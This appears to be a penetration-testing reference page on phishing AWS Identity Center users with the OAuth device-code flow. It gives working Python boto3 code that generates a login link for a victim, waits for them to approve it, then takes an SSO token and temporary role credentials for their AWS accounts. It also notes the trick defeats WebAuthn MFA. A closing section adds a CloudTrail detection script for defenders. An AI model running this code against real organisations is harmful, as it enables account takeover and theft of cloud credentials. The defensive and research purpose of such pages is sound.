AWS - Identity Center & SSO Unauthenticated Enum

Support HackTricks

AWS Device Code Phishing

First proposed in this blog post, it is possible to send a link to a user who uses AWS SSO such that, if the user accepts it, the attacker will be able to obtain a token to impersonate the user and access all the roles that user can access in Identity Center.

To perform this attack, the requirements are:

  • The victim needs to be using Identity Center

  • The attacker must know the subdomain used by the victim: <victimsub>.awsapps.com/start

With that information, the attacker will be able to send the user a link that, if accepted, gives the attacker access to the user's AWS account.

Attack

  1. Finding the subdomain

The attacker's first step is to discover the subdomain the victim company uses for its Identity Center. This can be done via OSINT or by guessing + brute force, since most companies will be using their name or a variation of it here.

With this information, it is possible to get the region where Identity Center was configured with:

curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1"
  2. Generate the link for the victim & send it

Run the following code to generate an AWS SSO login link so the victim can authenticate. For demonstration purposes, run this code in a Python console and do not exit it, as later you will need some of these objects to get the token:

import boto3

REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS

sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
    clientName='attacker',
    clientType='public'
)

client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
    clientId=client_id,
    clientSecret=client_secret,
    startUrl=AWS_SSO_START_URL
)

url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)

Send the generated link to the victim using your awesome social engineering skills!

  3. Wait until the victim accepts

If the victim was already logged in to AWS they will only need to accept granting the permissions; if not, they will need to log in first and then accept. This is what the prompt looks like these days:

  4. Get the SSO token

If the victim accepted the prompt, run this code to create the SSO token impersonating the user:

token_response = sso_oidc.create_token(
    clientId=client_id,
    clientSecret=client_secret,
    grantType="urn:ietf:params:oauth:grant-type:device_code",
    deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')

The SSO access token is valid for 8h.

  5. Impersonate the user

sso_client = boto3.client('sso', region_name=REGION)

# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
    accessToken=sso_token,
    maxResults=100
)
accounts = aws_accounts_response.get('accountList', [])
print(accounts)
account_id = accounts[0]['accountId']  # pick the account you are interested in

# Get roles inside an account
roles_response = sso_client.list_account_roles(
    accessToken=sso_token,
    accountId=account_id
)
roles = roles_response.get('roleList', [])
print(roles)
role_name = roles[0]['roleName']  # pick the role you are interested in

# Get credentials over a role
sts_creds = sso_client.get_role_credentials(
    accessToken=sso_token,
    roleName=role_name,
    accountId=account_id
)
print(sts_creds.get('roleCredentials'))

Phishing the unphisable MFA

It is interesting to know that the previous attack works even when "unphishable MFA" (WebAuthn) is in use. This is because the previous flow never leaves the OAuth domain that is being used. Unlike other phishing attacks, where the user needs to switch to a different login domain, here the device code flow is designed so that the code is known to a device and the user can log in even from a different machine. If the prompt is accepted, the device, knowing the initial code, will be able to retrieve credentials for the user.

For more information about this, check this post.
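A defender-side counterpart, added here and not part of the original page: the three OIDC calls used above (RegisterClient, StartDeviceAuthorization, CreateToken) are API calls that CloudTrail records, so a detection can correlate them per source IP and flag device-code token grants whose polling client sits outside the ranges where your own `aws sso login` traffic originates. The record layout and the `sso.amazonaws.com` eventSource value are assumptions modelled on CloudTrail's shape, and the events below are constructed.

```python
import ipaddress
from collections import defaultdict

DEVICE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"

# Constructed CloudTrail-style records for the flow on this page (field names are
# assumed to mirror CloudTrail; the values are made up, not real logs).
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "RegisterClient", "sourceIPAddress": "203.0.113.7",
     "requestParameters": {"clientName": "attacker", "clientType": "public"}},
    {"eventTime": "2024-01-01T10:00:05Z", "eventSource": "sso.amazonaws.com",
     "eventName": "StartDeviceAuthorization", "sourceIPAddress": "203.0.113.7",
     "requestParameters": {"startUrl": "https://victim.awsapps.com/start"}},
    {"eventTime": "2024-01-01T10:03:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "CreateToken", "sourceIPAddress": "203.0.113.7",
     "requestParameters": {"grantType": DEVICE_GRANT}},
    # Same flow from the corporate range: an engineer running `aws sso login`.
    {"eventTime": "2024-01-01T11:00:00Z", "eventSource": "sso.amazonaws.com",
     "eventName": "StartDeviceAuthorization", "sourceIPAddress": "10.20.0.9",
     "requestParameters": {"startUrl": "https://victim.awsapps.com/start"}},
    {"eventTime": "2024-01-01T11:00:30Z", "eventSource": "sso.amazonaws.com",
     "eventName": "CreateToken", "sourceIPAddress": "10.20.0.9",
     "requestParameters": {"grantType": DEVICE_GRANT}},
]

def flag_device_code_grants(events, trusted_cidrs):
    """Return one finding per device-code token grant whose polling client is
    outside the trusted ranges, enriched with the clientName and startUrl seen
    from the same IP earlier in the flow."""
    nets = [ipaddress.ip_network(c) for c in trusted_cidrs]
    context = defaultdict(dict)  # sourceIP -> clientName / startUrl seen so far
    findings = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        if ev.get("eventSource") != "sso.amazonaws.com":
            continue
        ip, name = ev["sourceIPAddress"], ev["eventName"]
        params = ev.get("requestParameters") or {}
        if name == "RegisterClient":
            context[ip]["clientName"] = params.get("clientName")
        elif name == "StartDeviceAuthorization":
            context[ip]["startUrl"] = params.get("startUrl")
        elif name == "CreateToken" and params.get("grantType") == DEVICE_GRANT:
            if not any(ipaddress.ip_address(ip) in n for n in nets):
                findings.append({"sourceIPAddress": ip,
                                 "eventTime": ev["eventTime"], **context[ip]})
    return findings

if __name__ == "__main__":
    for f in flag_device_code_grants(SAMPLE_EVENTS, ["10.0.0.0/8"]):
        print("suspicious device-code grant:", f)
```

In a real deployment the trusted ranges would come from your egress inventory, and a finding should be paired with the user who approved the code so the session can be revoked before the 8h token lifetime expires.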
